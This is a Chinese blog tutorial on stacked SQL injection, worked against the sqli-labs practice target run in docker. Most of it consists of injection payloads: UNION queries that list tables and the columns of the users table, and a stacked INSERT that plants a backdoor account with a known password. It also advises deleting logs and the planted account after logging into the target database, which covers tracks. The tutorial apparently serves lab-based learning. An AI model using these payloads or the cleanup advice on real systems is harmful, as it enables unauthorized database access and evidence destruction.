首页 > 其他分享 >8.堆叠注入

8.堆叠注入

时间:2023-11-11 10:44:32浏览次数:31  
标签:users 账号 数据库 查询 堆叠 id select 注入

原理 这种注入手法可以对数据库进行增删改查 而不是像之前一样只能查询数据 0   0 启动靶场 sudo docker run -dt --name sqli -p 7766:80 acgpiano/sqli-labs   0 注入利用 0 开始试探 0   0   0 两次试探返回不一样,可能存在注入 试探结束 0 提取库中的所有的表 ?id=-999' union select 1,2,(select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database() limit 1)--+ 0 四个表: emails referers uagents users   获取指定表中所有的字段 ?id=-999' union select 1,2,(select group_concat(column_name)from information_schema.columns where TABLE_NAME='users' limit 1)%23 0 三个字段: id username password 创建临时账户 0 这个账户创建后,可以利用这个账户直接登录对方数据库,当离开时,将日志和这个账户删除即可 账号创建 账号名baiyang,密码123456,位置为users表的20号位置 ?id=1';insert into users(id,username,password)values(20,'baiyang','123456')%23 创建成功 0 查看结果 0 账号插入成功 查询已有账号和密码 0 将查询结果作为一个账号插入到数据库users表的第22行,然后让数据库直接正常返回第22行的数据,得到想要的子查询结果 将正常账号位改为子查询语句 select database() 修改查询ID 0 插入并查询成功 0 当前连接的数据库名为security

标签:users,账号,数据库,查询,堆叠,id,select,注入
From: https://www.cnblogs.com/baimuyangren/p/17825616.html

相关文章

  • 11.cookie注入
    原理 在这里更改cookies的值 黑盒测试下的cookies注入   实战创建额外的cookies值,并将其填充为'发送报文发现需要跳转,跟随跳转发现报错三次不同的注入发现报错结果不同可以证明这里拥有cookies注入点利用联合查询得到敏感信息......
  • 10.宽字节注入
    原理利用%df使注入语句逃逸  代码审计黑盒测试下的宽字节注入试探字符型试探?id=1%df%27%23试探成功注入获取敏感信息?id=1%df%27unionselect1,2,3%23  ?id=%df%27unionselect1,user(),database()%23这里的关键要让第一个语句错误:?id=%df%27这......
  • 1.SQL注入神器
        两种常用手法1.利用bp中的slmap下载co2     要确认安装了python然后指定sqlmap.py指定当前操作系统指定python路径   这时有y的选择y爆破成功 ......
  • 2.手工SQL注入概念
           因为这个1是用户可以控制的,当用户写入'时,就会像这样而当这样查询就会同时得到两个值还有一种方法与运算方法这样可以测试出,有没有这个注入点 判断是否存在注入点 停顿5秒再返回--为SQL中的注释符三种SQL语句的注释符注入流程......
  • 3.3.手工SQL注入
    首先输入正确账号,得到正确结果 开始试探试探变量可影响性确认用户控制的变量是否可以影响数据库 在非用户名不同的情况下,因为并查询结果导致报错,确认变量可以影响对方数据库试探注入点个数一个试探成功两个注入点试探成功第三个注入点试探失败确认此处有......
  • Python MySQL 数据库查询:选择数据、使用筛选条件、防止 SQL 注入
    从表格中选择数据要从MySQL中的表格中选择数据,请使用"SELECT"语句:示例选择"customers"表格中的所有记录,并显示结果:importmysql.connectormydb=mysql.connector.connect(host="localhost",user="yourusername",password="yourpassword",datab......
  • Python MySQL 数据库查询:选择数据、使用筛选条件、防止 SQL 注入
    从表格中选择数据要从MySQL中的表格中选择数据,请使用"SELECT"语句:示例选择"customers"表格中的所有记录,并显示结果:importmysql.connectormydb=mysql.connector.connect(host="localhost",user="yourusername",password="yourpassword",datab......
  • 实现MyBatisPlus自定义sql注入器
    目标:新增mysql下的插入更新的语法INSERTINTO%s%sVALUES%sONDUPLICATEKEYUPDATE%s新增方法类,新增的方法名称为insertOrUpdate和insertOrUpdateBatch方法,但其mapper层的方法名为insertOrUpdate方法importcom.baomidou.mybatisplus.annotation.IdType;importcom.b......
  • Kafka JNDI 注入分析(CVE-2023-25194)
    ApacheKafkaClientsJndiInjection漏洞描述ApacheKafka是一个分布式数据流处理平台,可以实时发布、订阅、存储和处理数据流。KafkaConnect是一种用于在kafka和其他系统之间可扩展、可靠的流式传输数据的工具。攻击者可以利用基于SASLJAAS配置和SASL协议的任意Kafka......
  • .net 温故知新【13】:Asp.Net Core WebAPI 使用依赖注入DI
    一、使用DI注入在之前的文章中已经讲过DI的概念(.net温故知新:【7】IOC控制反转,DI依赖注入),基于控制台程序演示了DI依赖注入的使用,基于Microsoft.Extensions.DependencyInjection完成。那在WebAPI中如何使用依赖注入呢?首先新建一个WebAPI项目WebAPI_DI,框架.net7,其实webapi项目......